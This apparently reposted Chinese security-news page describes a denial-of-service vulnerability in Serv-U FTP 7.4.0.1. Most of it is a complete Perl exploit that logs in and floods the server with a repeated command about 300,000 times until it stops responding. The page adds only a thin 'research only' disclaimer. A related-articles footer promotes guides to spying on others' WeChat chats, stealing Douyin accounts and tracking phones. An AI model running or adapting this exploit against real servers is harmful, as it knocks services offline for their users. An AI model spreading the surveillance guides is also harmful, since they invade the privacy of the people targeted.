Serv-U FTP服务器 *** NT命令远程拒绝服务漏洞

访客4年前黑客资讯376

影响版本:
RhinoSoft Serv-U 7.4.0.1
漏洞描述:
BUGTRAQ  ID: 34127

Serv-U FTP是一款FTP服务程序。

如果远程攻击者向Serv-U FTP服务器发送特制 *** NT请求的话,就可以导致服务器停止响应。<*参考
Jonathan Salwan (submit@shell-storm.org)
*>
SEBUG安全建议:
厂商补丁:

RhinoSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.serv-u.com/
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
 

#!/usr/bin/perl
# Soft    : FTP Serv-U
# Version : v7.4.0.1
#
# Denial of Service in Serv-u up to 7.4.0.1 (no crash)
# Just the server is saturated, it stops responding.
#
# Author: Jonathan Salwan
# Mail: submit [AT] shell-storm.org
# Web: http://www.shell-storm.org


use IO::Socket;
print "[+] Author : Jonathan Salwan \n";
print "[+] Soft: FTP Serv-U\n";

 if (@ARGV < 3)
  {
   print "[*] Usage: <serv-u.pl> <host> <port>\n";
   print "[*] Exemple: serv-u.pl 127.0.0.1 21 jonathan toto\n";
   exit;
  }

 $ip  = $ARGV[0];
 $port  = $ARGV[1];
 $user = $ARGV[2];
 $pass = $ARGV[3];

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "\n[-] Connecting: Failed!\n";

print "\n[+] Connecting: Ok!\n";
print "[+] Sending request...\n";


$evil = " *** NT\r\n" x 300000;

$after = "\x2A\x2A";

 print $socket "USER $user\r\n";
 print $socket "PASS $pass.$after\r\n";
 print $socket "$evil";
 
  sleep(1);
  close($socket);

print "[+]Done! the server is saturated.\n";

 

标签: 好话题

相关文章

老公和别人的微信聊天记录怎么查看 怎么样查看电脑里的微信聊天

老公和别人的微信聊天记录怎么查看 怎么样查看电脑里的微信聊天 波场dapp——TronBank曾于凌晨遭到假币攻击,1小时内被盗走约1.7亿枚BTT(价值约85万米)!黑客创建了名为BTTx的假币向...

黑客教你3分钟盗抖音(有破解别人抖音隐私的软件吗)

黑客教你3分钟盗抖音(有破解别人抖音隐私的软件吗)

 Avast是一款欧洲知名的杀毒软件,其凭借强大的杀毒能力和免费使用的特点赢得了诸多用户。但现在,由于捆绑软件多和用户质量下降等原因,这款杀毒软件被越来越多的人视为流氓软件。     近...

怎么监控别人微信聊天记录吗 微信怎么看聊天记录|微信密码忘了

怎么监控别人微信聊天记录吗 微信怎么看聊天记录|微信密码忘了 泰国驻华使馆25日在北京举办电子签证系统启动仪式。泰国外交部领事司司长察迪·安乍纳南表示,为了给前往泰国的旅客提供便利,泰国开发了电子签...

微信朋友圈封了怎么解封(朋友圈永久封如何解除)_微信朋友

微信朋友圈封了怎么解封(朋友圈永久封如何解除),比年来,短视频可谓是一片火海。快手和哆嗦等领域正在快突起。这些短视频领域也成为咱们每天刷流量的好去向。 微信朋友圈封了怎么解封 1.昨年,腾讯以“范...

黑客高手教你定位手机号码 分享给大家手机定位追踪教程_你自己

黑客教你定位手机号码 分享给大家手机定位追踪教程,经常看港剧的朋友们肯定都记得这样一个情节,警察在监听勒索赎金的绑匪电话时,都会要求电话时常可以久一点,这样他们就可以更精确地进行手机号码定位追踪了,相...

苹果禁用FaceTime群组通话以防止黑客窃取用户信息_苹果

苹果的状态页面显示,通过FaceTime进行的群组通话“暂时不可用”—— 这是一个止损举动,同时,苹果本周将对此问题提供更完善的解决方案。不久之前我们前尝试设置群组通话时无果,但是现在漏洞已经被修复了...